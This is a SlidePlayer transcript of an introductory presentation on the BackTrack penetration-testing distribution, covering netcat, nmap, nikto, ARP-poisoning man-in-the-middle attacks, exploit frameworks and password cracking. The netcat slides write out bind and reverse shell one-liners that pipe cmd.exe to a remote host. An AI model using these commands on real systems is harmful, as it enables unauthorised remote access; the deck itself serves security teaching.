<< back | track 3 Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk.

Slides:



Advertisements
Similar presentations
Ethical Hacking Module VII Sniffers.
Advertisements

Man in the Middle Attack
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
By Hiranmayi Pai Neeraj Jain
Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.
5-Network Defenses Dr. John P. Abraham Professor UTPA.
Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
System Security Scanning and Discovery Chapter 14.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
IS Network and Telecommunications Risks
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
How Clients and Servers Work Together. Objectives Learn about the interaction of clients and servers Explore the features and functions of Web servers.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Instant Messaging Security Flaws By: Shadow404 Southern Poly University.
Nikto LUCA ALEXANDRA ADELA. Nikto  Web server assessment tool  Written by Chris Solo and David Lodge  Released on December 27, 2001  Stable release:
Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.
Lab #2 CT1406 By Asma AlOsaimi. "Security has been a major concern in today’s computer networks. There has been various exploits of attacks against companies,
Ladd Van Tol Senior Software Engineer Security on the Web Part One - Vulnerabilities.
Karlstad University Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
The Truth About Protecting Passwords COEN 150: Intro to Information Security Mary Le Carol Reiley.
This courseware is copyrighted © 2015 gtslearning. No part of this courseware or any training material supplied by gtslearning International Limited to.
Software Security Testing Vinay Srinivasan cell:
BY OLIVIA WILSON AND BRITTANY MCDONALD Up Your Shields with Shields Up!
COEN 350 Security Threats. Network Based Exploits Phases of an Attack  Reconnaissance  Scanning  Gaining Access  Expanding Access  Covering Tracks.
Attacks On systems And Networks To understand how we can protect our system and network we need to know about what kind of attacks a hacker/cracker would.
Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,
© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze.
System Hacking Active System Intrusion. Aspects of System Hacking System password guessing Password cracking Key loggers Eavesdropping Sniffers Man in.
Linux Networking and Security
CHAPTER 3 Classes of Attack. INTRODUCTION Network attacks come from both inside and outside firewall. Kinds of attacks: 1. Denial-of-service 2. Information.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
Computer Networking From LANs to WANs: Hardware, Software, and Security Chapter 13 FTP and Telnet.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
CIS 450 – Network Security Chapter 14 – Specific Exploits for UNIX.
CHAPTER 9 Sniffing.
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.
Switch Features Most enterprise-capable switches have a number of features that make the switch attractive for large organizations. The following is a.
Network Security Part III: Security Appliances Firewalls.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
Kali Linux BY BLAZE STERLING. Roadmap  What is Kali Linux  Installing Kali Linux  Included Tools  In depth included tools  Conclusion.
SSH. 2 SSH – Secure Shell SSH is a cryptographic protocol – Implemented in software originally for remote login applications – One most popular software.
Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
By Collin Donaldson Man in the Middle Attack: Password Sniffing and Cracking.
Top 10 Hacking Tool Welcome TO hackaholic Kumar shubham.
Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
TCP Sliding Windows For each TCP connection each hosts keep two Sliding Windows, send sliding window, and receive sliding window to make sure the correct.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
An Introduction To ARP Spoofing & Other Attacks
Chapter Objectives In this chapter, you will learn:
Networks Fall 2009.
Penetration Testing: Concepts,Attacks and Defence Stratagies
Chapter 7: Identifying Advanced Attacks
A Comprehensive Security Assessment of the Westminster College Unix Lab Jacob Shodd.
Backdoor Attacks.
Secure Software Confidentiality Integrity Data Security Authentication
Troubleshooting Network Communications
Security Fundamentals
Metasploit a one-stop hack shop
SUBMITTED BY: NAIMISHYA ATRI(7TH SEM) IT BRANCH
Topic 5: Communication and the Internet
RECONNAISSANCE & ENUMERATION
Cyber Operation and Penetration Testing Online Password Cracking Cliff Zou University of Central Florida.
Test 3 review FTP & Cybersecurity
Computer Networks ARP and RARP
Presentation transcript:

<< back | track 3 Introduction to BackTrack Local boot to remote root in just one CD Thought for the day, “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk Kunal Sehgal

<< back | track 3 Introduction: BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux Operating System, all wrapped-up on a bootable (live) CD The most top rated Linux live distribution focused on penetration testing Consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals Rated #1 Security-Distro by insecure.org & sectools.org

<< back | track 3 Miscellaneous BT Services: HTTP (Port: 80) TFTP (Port: 69) SSH (Port: 22) VNC (Port: 5901)

<< back | track 3 Netcat: A computer networking utility for reading from and writing to network connections on either TCP or UDP Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections Bind Shell Reverse Shell

<< back | track 3 Attacker (Private IP) Victim (Public IP) NAT Internet Bind Shell: nc -lvp e cmd.exenc -v 4444 Internet Attacker Connects to Victim (Incoming Traffic)

<< back | track 3 Attacker (Public IP) Victim (Private IP) Internet Reverse Shell: nc -v e cmd.exenc -lvp 4444 Internet NAT Victim sends the shell (Outgoing Traffic)

<< back | track 3 Nmap: A security scanner used to discover computers and services on a computer network, thus creating a "map" of the network Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.

<< back | track 3 Nikto: A scanner which performs comprehensive tests against web servers for multiple items Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers Not every check is a security problem, though most are There are some items that are "info only" type checks that look for items that may not have a security flaw, but the webmaster or security engineer may not know are present on the server

<< back | track 3 ARP Poisoning – Man In The Middle Attack: MAC Address: Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification Address Resolution Protocol (ARP): A method for finding a host's hardware address when only its Network Layer address is known Ettercap: A suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks

<< back | track 3 Attacker Sender Receiver Network Using A Hub Can easily sniff data

<< back | track 3 Attacker Sender Receiver Network Using A Switch Cannot sniff any data :(

<< back | track 3 Attacker Sender Receiver Man In The Middle Attack Hi everyone, I’m the switch

<< back | track 3 Exploits: An exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur Frequently includes such things as violently gaining control of a computer system or allowing privilege escalation or a denial of service attack Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or patchfree computer application vulnerabilities &

<< back | track 3 Exploits (Conti…): Attack / Exploit Vulnerability App Protocol O/S Add a user Get a remote shell GUI access Change routing tables Etc.. Etc.. Payload

<< back | track 3 Exploit Frameworks: A development platform for creating security tools and exploits Used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide A boon for script kiddies

<< back | track 3 Windows DCOM RPC Interface Buffer Overrun: Exploits a vulnerability in Windows OS The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system Bind Shell

<< back | track 3 IE IsComponentInstalled Buffer Overflow Vulnerability: Exploits a vulnerability in an application (MS Internet Explorer) Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser Reverse Shell

<< back | track 3 MS Windows Graphics Rendering Engine WMF: Exploits a vulnerability in MS Windows WMF graphics rendering engine The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file

<< back | track 3 Passwords Hacking: Why hack local passwords? Install softwares – key loggers, trojans, etc Gain access to another PC, Server, Router, etc. People re-use passwords all the time Types of attack: Brute force Attack Dictionary Attack Rainbow Tables

<< back | track 3 Password Attack Vectors: Online Attack: Attacking network services that require a user to log on, by guessing the correct password Offline Attack: Attacking hash files that store encrypted passwords Physical Access Attack: Attacking machines and other network devices, after gaining physical access

<< back | track 3 How To Hack Windows Passwords? Available Tools: John The Ripper, Cain & Abel, Rainbow Tables Gain access to the victim’s PC

<< back | track 3 Google Hacking: Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others

<< back | track 3 References: johnny.ihackstuff.com

<< back | track 3 Questions?? Feel free to contact me: Kunal Sehgal

<< back | track 3 Workshop Exercise:

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.